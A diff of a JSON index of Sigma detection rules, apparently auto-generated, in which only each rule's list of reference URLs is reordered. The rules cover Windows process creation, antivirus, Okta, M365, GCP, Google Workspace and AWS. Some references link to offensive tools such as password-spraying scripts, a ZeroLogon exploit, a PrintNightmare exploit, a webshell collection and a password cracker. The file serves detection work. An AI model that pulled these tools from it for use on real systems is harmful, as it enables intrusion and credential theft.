"https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" ], "tags": [ @@ -67955,8 +67955,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "https://github.com/sensepost/ruler", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook.yml" ], "tags": [ @@ -68044,19 +68044,19 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/samratashok/nishang", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://adsecurity.org/?p=2921", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", - "https://github.com/calebstewart/CVE-2021-1675", - "https://github.com/HarmJ0y/DAMP", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/HarmJ0y/DAMP", "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://github.com/samratashok/nishang", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml" ], "tags": [ @@ -68289,9 +68289,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", - "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", + "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", + "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" ], "tags": [ @@ -68324,8 +68324,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", "https://twitter.com/mrd0x/status/1465058133303246867", + "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml" ], "tags": [ @@ -68384,9 +68384,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", - "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml" ], "tags": [ @@ -68419,10 +68419,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/lefterispan/status/1286259016436514816", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", - "https://twitter.com/jseerden/status/1247985304667066373/photo/1", + "https://twitter.com/lefterispan/status/1286259016436514816", "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", + "https://twitter.com/jseerden/status/1247985304667066373/photo/1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml" ], "tags": [ @@ -68626,9 +68626,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", "https://twitter.com/cyb3rops/status/1514217991034097664", "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml" ], "tags": [ @@ -68670,8 +68670,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/harr0ey/status/992008180904419328", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", + "https://twitter.com/harr0ey/status/992008180904419328", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml" ], "tags": [ @@ -68704,8 +68704,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19", "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", + "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_cmd_ransomware.yml" ], "tags": [ @@ -68772,8 +68772,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1511415432888131586", "https://twitter.com/mrd0x/status/1511489821247684615", + "https://twitter.com/mrd0x/status/1511415432888131586", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" ], "tags": [ @@ -68807,8 +68807,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" ], "tags": [ @@ -68856,8 +68856,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" ], "tags": [ @@ -69041,8 +69041,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml" ], "tags": [ @@ -69183,8 +69183,8 @@ "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", "https://twitter.com/mvelazco/status/1410291741241102338", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_printernightmare_cve_2021_34527.yml" ], @@ -69317,15 +69317,15 @@ "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", - "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", - "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", - "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", - "https://github.com/tennc/webshell", "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", + "https://github.com/tennc/webshell", + "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", + "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", + "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml" ], "tags": [ @@ -69504,9 +69504,9 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", "https://developer.okta.com/docs/reference/api/event-types/", + "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" ], "tags": "No established tags" @@ -69527,8 +69527,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" ], "tags": [ @@ -69551,8 +69551,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" ], "tags": [ @@ -69575,8 +69575,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" ], "tags": [ @@ -69599,8 +69599,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" ], "tags": [ @@ -69623,8 +69623,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" ], "tags": [ @@ -69647,8 +69647,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" ], "tags": [ @@ -69671,8 +69671,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" ], "tags": [ @@ -69695,8 +69695,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" ], "tags": [ @@ -69719,8 +69719,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" ], "tags": [ @@ -69743,8 +69743,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" ], "tags": [ @@ -69769,8 +69769,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" ], "tags": [ @@ -69793,8 +69793,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml" ], "tags": [ @@ -69827,8 +69827,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml" ], "tags": [ @@ -69861,8 +69861,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_from_susp_ip_addresses.yml" ], "tags": [ @@ -69895,8 +69895,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_inbox_forwarding.yml" ], "tags": [ @@ -69929,8 +69929,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml" ], "tags": [ @@ -69953,11 +69953,11 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", - "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", "https://o365blog.com/post/aadbackdoor/", - "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", "https://www.sygnia.co/golden-saml-advisory", + "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" ], "tags": [ @@ -69990,8 +69990,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml" ], "tags": [ @@ -70048,8 +70048,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml" ], "tags": [ @@ -70082,8 +70082,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml" ], "tags": [ @@ -70116,8 +70116,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml" ], "tags": [ @@ -70140,8 +70140,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_impossible_travel_activity.yml" ], "tags": [ @@ -70165,8 +70165,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml" ], "tags": [ @@ -70232,8 +70232,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml" ], "tags": [ @@ -70365,9 +70365,9 @@ "refs": [ "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", + "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", "https://github.com/elastic/detection-rules/pull/1267", "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml" ], "tags": [ @@ -70415,8 +70415,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://cloud.google.com/kubernetes-engine/docs", "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://cloud.google.com/kubernetes-engine/docs", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" ], @@ -70468,8 +70468,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml" ], "tags": [ @@ -70638,8 +70638,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" ], "tags": [ @@ -70672,9 +70672,9 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" ], "tags": [ @@ -70697,8 +70697,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml" ], "tags": [ @@ -70731,8 +70731,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml" ], "tags": [ @@ -70755,8 +70755,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml" ], "tags": [ @@ -70779,9 +70779,9 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" ], "tags": [ @@ -70804,8 +70804,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" ], "tags": [ @@ -70885,12 +70885,12 @@ "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", - "https://github.com/elastic/detection-rules/pull/1145/files", - "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", + "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", + "https://github.com/elastic/detection-rules/pull/1145/files", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" ], "tags": [ @@ -71033,8 +71033,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", + "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml" ], "tags": [ @@ -71429,8 +71429,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml" ], "tags": [ @@ -71616,9 +71616,9 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ + "https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md", "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html", "https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/", - "https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_buckets.yml" ], "tags": [ @@ -71757,8 +71757,8 @@ "logsource.category": "No established category", "logsource.product": "aws", 